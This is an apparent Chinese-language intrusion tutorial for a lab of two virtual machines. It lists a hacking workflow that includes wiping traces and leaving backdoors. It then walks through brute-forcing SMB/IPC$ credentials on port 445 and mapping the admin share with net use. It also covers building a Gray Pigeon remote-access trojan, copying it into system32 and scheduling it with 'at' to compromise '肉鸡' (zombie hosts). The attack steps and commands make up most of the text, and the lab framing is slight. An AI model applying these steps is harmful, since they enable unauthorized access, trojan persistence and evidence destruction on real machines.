一:流程
1 信息收集
nslookup whois
2 扫描漏洞
namp软件,扫描IP范围,端口
scanport软件
高级扫描:如IIS漏洞,扫描网站漏洞
3 漏洞利用
4 提权(shell环境、桌面环境、最高权限)
5 为所欲为。。。。。。。。
6 毁尸灭迹
7 留后门(植入木马)
8 渗透测试报告(风险等级,漏洞类型,安全加固方案等)
二:手工测试端口号
telnet IP 端口号
net use f: \\10.1.1.2\share 密码 /user:用户名 把对方的共享文件夹映射为自己的f盘
net use 查看有多少网络共享链接
net use f: /del
net use * /del
net use f: \\10.1.1.2\c$ 密码 /user:用户名
net use \\10.1.1.2\ipc$ 密码 /user:用户名 创建一个空链接,可以访问所有内容
1:scanport扫描445端口
2:445漏洞利用之一IPC$:进行暴力破解:用到工具NTscan
3:net use \\10.1.1.2\ipc$ 密码 /user:用户名
4:制作木马 ,利用灰鸽子软件
5:植入木马(留后门)
copy d:\heihei.exe \\10.1.1.1\C$\windows\system32
6:设置计划任务,自动执行木马:
net time \\10.1.1.2
at \\10.1.1.2 11:11 "c:\windows\system32\heihei.exe"
7:等待肉鸡上线
三: 入侵(手动滑稽) 渗透步骤
虚拟机快照还原至初始状态
准备好xp和win2003,连接至同一网络,分别配置IP10.1.1.2/24,10.1.1.1/24
准备好软件
打开scanport软件扫描窗口
发现,局域网内有一台电脑开放了445端口号,它的IP地址是10.1.1.1
以记事本形式打开密码字典和账号字典,因为是做实验,所以加入一个正确的密码,放在其中
开始爆破
这时候我们就知道了,对方的账号administrator和密码123.com
现在就可以查看对方电脑的盘符文件了,比如查看C盘
再比如:我要控制对方关机
接下来运行刚才的关机脚本
如果直接这么做的话,那就是坑自己了,好像是运行\10.1.1.1\c$里面的脚本。实际上是在本机上运行
方法一:
可以telnet连接,前提是对方开启了23端口号
开启23之后,输入刚才爆破的账号密码,
方法二:
那对方没有开启23端口号呢,用到另外一条命令
at \\ip 时间 "运行程序的路径",注意这个路径不用c$,而是c:
接下来是留后门,植入木马,方便下次进入,打开软件“鸽子牧民战天”
这就是刚才生成的木马,我把保存路径修改成e盘根目录
接下来把xp本机生成的木马放到
三分钟之后,查看是否成功
渗透成功
若是渗透不成功,有可能是如下图的安装路径有问题,可以用默认的或者再换个路径试试